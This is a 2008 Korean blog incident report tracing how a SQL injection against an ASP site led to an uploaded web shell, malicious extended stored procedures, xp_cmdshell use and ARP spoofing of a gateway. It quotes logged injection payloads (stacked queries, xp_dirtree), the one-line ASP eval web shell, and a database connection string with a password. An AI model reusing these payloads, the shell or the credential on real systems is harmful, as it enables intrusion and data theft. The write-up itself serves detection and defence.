2008.06.02 11:43

SQL Injection 공격에 의한 Arp Spoofing 공격 유형

관리서버중 게이트웨이 점령 현상이 발생되었던 적이 있습니다.
해당 서버는 SQL Injection 공격의 의한 사항으로 짐작이 되는 사항으로 이 글을 보는 모든 분들에게 도움이 되었으면 좋겠습니다.

####################################################################################
* Injection 공격 시도.

2008-03-13 00:00:09 W3SVC287622377 XXX.XXX.XXX.XXX(서버IP) POST /Upload/app/app.asp pageName=MsDataBase&theAct=showTables 80 - 211.171.202.48(공격 IP) Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727;+GreenBrowser) 200 0 0
2008-03-13 00:00:20 W3SVC287622377 XXX.XXX.XXX.XXX GET /Upload/app/app.asp %23=Execute(Session(%22%23%22))&pageName=MsDataBase&theAct=query&sqlStr=sql%3AProvider%3DSQLOLEDB%2E1%3BPersist+Security+Info%3DFalse%3BUser+ID%3Dsgtc%3BInitial+Catalog%3Dsgtc%3BData+Source%3D211%2E115%2E92%2E188%2C2433%3Bpassword%3Dmadeweb%2Eco%2Ekr 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727;+GreenBrowser) 200 0 0
2008-03-13 00:01:00 W3SVC287622377 XXX.XXX.XXX.XXX POST /Upload/app/app.asp pageName=MsDataBase&theAct=query&sqlStr=sql%3AProvider%3DSQLOLEDB%2E1%3BPersist+Security+Info%3DFalse%3BUser+ID%3Dsgtc%3BInitial+Catalog%3Dsgtc%3BData+Source%3D211%2E115%2E92%2E188%2C2433%3Bpassword%3Dmadeweb%2Eco%2Ekr 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727;+GreenBrowser) 200 0 0
2008-03-13 00:01:21 W3SVC287622377 XXX.XXX.XXX.XXX POST /Upload/app/app.asp pageName=MsDataBase&theAct=showTables 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727;+GreenBrowser) 200 0 0
2008-03-13 00:01:21 W3SVC287622377 XXX.XXX.XXX.XXX GET /Upload/app/app.asp %23=Execute(Session(%22%23%22))&pageName=MsDataBase&theAct=query&sqlStr=sql%3AProvider%3DSQLOLEDB%2E1%3BPersist+Security+Info%3DFalse%3BUser+ID%3Dsgtc%3BInitial+Catalog%3Dmaster%3BData+Source%3D211%2E115%2E92%2E188%2C2433%3Bpassword%3Dmadeweb%2Eco%2Ekr 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727;+GreenBrowser) 200 0 0
2008-03-13 00:01:23 W3SVC287622377 XXX.XXX.XXX.XXX POST /Upload/app/app.asp pageName=MsDataBase&theAct=query&sqlStr=sql%3AProvider%3DSQLOLEDB%2E1%3BPersist+Security+Info%3DFalse%3BUser+ID%3Dsgtc%3BInitial+Catalog%3Dmaster%3BData+Source%3D211%2E115%2E92%2E188%2C2433%3Bpassword%3Dmadeweb%2Eco%2Ekr 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727;+GreenBrowser) 200 0 0
2008-03-13 00:01:43 W3SVC287622377 XXX.XXX.XXX.XXX GET /htm/01_introduction/01_introduction_06_01_view.asp sid=257;DROP/**/TABLE/**/NB_TreeList_Tmp;CREATE/**/TABLE/**/NB_TreeList_Tmp(subdirectory/**/nvarchar(400)/**/NULL,depth/**/tinyint/**/NULL,[file]/**/bit/**/NULL)--|398|80040e07|varchar_값_'257;DROP/**/TABLE/**/NB_TreeList_Tmp;CREATE/**/TABLE/**/NB_TreeList_Tmp(subdirectory/**/nvarchar(400)/**/NULL_depth/**/tinyint/**/NULL_[file]/**/bit/**/NULL)--'을(를)_int_데이터_형식의_열로_변환하는_중_구문_오류가_발생했습니다. 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 500 0 0
2008-03-13 00:01:43 W3SVC287622377 XXX.XXX.XXX.XXX GET /htm/01_introduction/01_introduction_06_01_view.asp sid=257;DELETE/**/NB_TreeList_Tmp;declare/**/@Z/**/nvarchar(4000)/**/set/**/@Z%3D0x64003A005C007700770077005F0072006F006F0074005C0073006700740063005F0069007000730069005C007000750062006C00690063005F00680074006D006C00;Insert/**/NB_TreeList_Tmp/**/exec/**/master..xp_dirtree/**/@Z,1,1--|398|80040e07|varchar_값_'257;DELETE/**/NB_TreeList_Tmp;declare/**/@Z/**/nvarchar(4000)/**/set/**/@Z=0x64003A005C007700770077005F0072006F006F0074005C0073006700740063005F0069007000730069005C007000750062006C00690063005F00680074006D006C00;Insert/**/NB_TreeList_Tmp/**/exec/**/master..xp_dirtree/**/@Z_1_1--'을(를)_int_데이터_형식의_열로_변환하는_중_구문_오류가_발생했습니다. 80 - 211.171.202.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 500 0 0
#####################################################################################
1. 업데이트 권한(인터넷게스트계정)이 있는 폴더에 해당 파일 업로드
날짜:  2008-03-13
시간:  오전 08:58
xp_nped.dll
app.asp
-> 내용 : <%eval(request(Chr(35)))%>
server.exe (실행 후 바로 삭제)
ps.exe  (실행 후 바로 삭제)
nkyjze.exe

2.확장 프로시져 xp_npsed 생성 09:01:23

내용 : d:\www_root\Upload\app\xp_nped.dll

3.해당 파일 외부에서 실행.
이벤트 형식: 정보
이벤트 원본: MSSQLSERVER
이벤트 범주: (2)
이벤트 ID: 17055
날짜:  2008-03-13
시간:  오전 9:02:06
사용자:  N/A
컴퓨터: XXX
설명:
8128 :
'd:\www_root\Upload\app\xp_nped.dll' 버전 'UNKNOWN'을(를) 사용하여 확장 저장 프로시저 'xp_npsed'을(를) 실행합니다.

4. NT계정 생성.
이벤트 형식: 정보
이벤트 원본: MSSQLSERVER
이벤트 범주: (2)
이벤트 ID: 17055
날짜:  2008-03-13
시간:  오전 9:04:16
사용자:  N/A
컴퓨터: XXX
설명:
8128 :
'xplog70.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_cmdshell'을(를) 실행합니다.

5.개체 인스턴트를 만듬.
이벤트 형식: 정보
이벤트 원본: MSSQLSERVER
이벤트 범주: (2)
이벤트 ID: 17055
날짜:  2008-03-13
시간:  오전 9:06:17
사용자:  N/A
컴퓨터: XXX
설명:
8128 :
'odsole70.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'sp_OAMethod'을(를) 실행합니다.

6. 업데이트한 파일 실행
이벤트 형식: 성공 감사
이벤트 원본: Security
이벤트 범주: 세부 추적
이벤트 ID: 593
날짜:  2008-03-13
시간:  오전 9:07:03
사용자:  NT AUTHORITY\SYSTEM
컴퓨터: XXX
설명:
프로세스가 종료됨:
  프로세스 ID: 4160
  이미지 파일 이름: D:\WWW_ROOT\Upload\app\server.exe
  사용자 이름: XXX$
  도메인:  WORKGROUP
  로그온 ID:  (0x0,0x3E7)


7. 업데이트한 파일 실행
이벤트 형식: 성공 감사
이벤트 원본: Security
이벤트 범주: 세부 추적
이벤트 ID: 593
날짜:  2008-03-13
시간:  오전 9:24:39
사용자:  NT AUTHORITY\SYSTEM
컴퓨터: XXX
설명:
프로세스가 종료됨:
  프로세스 ID: 4028
  이미지 파일 이름: D:\WWW_ROOT\Upload\app\ps.exe
  사용자 이름: XXX$
  도메인:  WORKGROUP
  로그온 ID:  (0x0,0x3E7)


8. Arp Spoofing 관련툴 다운로드후 실행
이벤트 형식: 성공 감사
이벤트 원본: Security
이벤트 범주: 세부 추적
이벤트 ID: 592
날짜:  2008-03-13
시간:  오전 10:53:29
사용자:  NT AUTHORITY\SYSTEM
컴퓨터: XXX
설명:
새 작업을 만들었습니다.
  새 프로세스 ID: 4764
  이미지 파일 이름: C:\WINDOWS\system32\nkyjze.exe
  만든 프로세스 ID: 4520
  사용자 이름: XXX$
  도메인:  WORKGROUP
  로그온 ID:  (0x0,0x3E7)

9.arp.exe 나 ipconfig.exe 등을 수차례 실행 시켜 정보 확인.

10.해당 프로세서로 인하여 게이트웨이 점령.

파일 생성 zxarps.exe
이벤트 형식: 성공 감사
이벤트 원본: Security
이벤트 범주: 세부 추적
이벤트 ID: 592
날짜:  2008-03-13
시간:  오전 10:54:38
사용자:  NT AUTHORITY\SYSTEM
컴퓨터: XXX
설명:
새 작업을 만들었습니다.
  새 프로세스 ID: 6080
  이미지 파일 이름: C:\PHP\zxarps.exe
  만든 프로세스 ID: 4764
  사용자 이름: XXX$
  도메인:  WORKGROUP
  로그온 ID:  (0x0,0x3E7)
###################################################################################
서버 내에서 삭제한 파일
app.asp
cmd.exe
info.php
nkyjze.dll
nkyjze.sys
nkyjze.exe
Packet.dll
WanPacket.dll
WinPcapCat.exe
wpcap.dll
xp_nped.dll
zxarps.exe
####################################################################################

Trackback 0 Comment 1